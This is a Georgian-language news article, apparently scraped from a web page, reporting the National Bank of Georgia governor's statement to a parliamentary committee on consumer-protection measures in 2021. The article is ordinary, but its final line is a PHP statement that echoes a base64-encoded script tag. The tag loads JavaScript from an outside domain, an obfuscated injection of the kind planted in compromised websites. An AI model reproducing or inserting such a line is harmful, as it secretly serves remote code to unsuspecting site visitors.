celsiusi
ავერსი საქკაბელი
საქართველოს ეროვნულ ბანკში აცხადებენ, რომ ეროვნული ბანკი მრავალი წელია, მომხმარებელთა უფლებების დაცვის მიმართულებით აქტიურად მუშაობს.
 
კობა გვენეტაძემ საფინანსო-საბიუჯეტო კომიტეტზე ამ მიმართულებით გადადგმულ ნაბიჯებზე ისაუბრა.
 
„ეროვნული ბანკის ერთ-ერთი უმთავრესი მიზანი საბანკო მომხმარებლების უფლებებისა და ინტერესების დაცვაა. ეროვნული ბანკი, როგორც საბანკო რეგულატორი, ისე არეგულირებს საბანკო სექტორს, რომ მომხმარებელი, მოქალაქე, ფინანსურ ორგანიზაციებთან ურთიერთობისას დაცული იყოს. აღნიშნული მიმართულებით, როგორც წინა წლებში, 2021 წელსაც, საქართველოს ეროვნულმა ბანკმა არაერთი მნიშვნელოვანი ნაბიჯი გადადგა. მათ შორის, არსებული საკანონმდებლო ჩარჩოს დახვეწისა და სექტორში საუკეთესო საერთაშორისო პრაქტიკის დანერგვის მიმართულებით, რაც თავის მხრივ, მოიცავდა სექტორთან კონსულტაციებს და სამუშაო შეხვედრებს. კერძოდ, შემუშავდა ფინანსური ორგანიზაციების მიერ კრედიტის ამოღებასთან დაკავშირებული ეთიკის კოდექსი და ფინანსური ორგანიზაციების მიერ მომსახურების გაწევისას მომხმარებელთა უფლებების დაცვის წესის ცვლილებები. კოდექსი ფინანსური ორგანიზაციების მხრიდან კეთილსინდისიერების, გამჭვირვალობისა და სამართლიანობის პრინციპებზე დამყარებული საქმიანი ურთიერთობების წარმართვას, ხოლო წესის ცვლილებები საბანკო პროდუქტებისა და მომსახურებების, მათ შორის მოთხოვნამდე დეპოზიტებისა და ოვერდრაფტების, მეტ გამჭვირვალობასა და შედეგად, მომხმარებელთა მხრიდან ინფორმირებული გადაწყვეტილებების მიღებას უზრუნველყოფს.
 
გარდა ამისა, მუდმივად მიმდინარეობდა დაწესებულ მოთხოვნებთან შესაბამისობის მონიტორინგი. ჩატარდა ტრენინგები პრაქტიკოსი მოსამართლეებისთვისაც. აქტიურად ფუნქციონირებდა ფინანსური განათლების პორტალი – ფინედუ; სხვადასხვა სამიზნე ჯგუფებისთვის ტარდებოდა ვებინარები, ონლაინშეხვედრები და კონკურსები“, – განაცხადა კობა გვენეტაძემ.
618
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");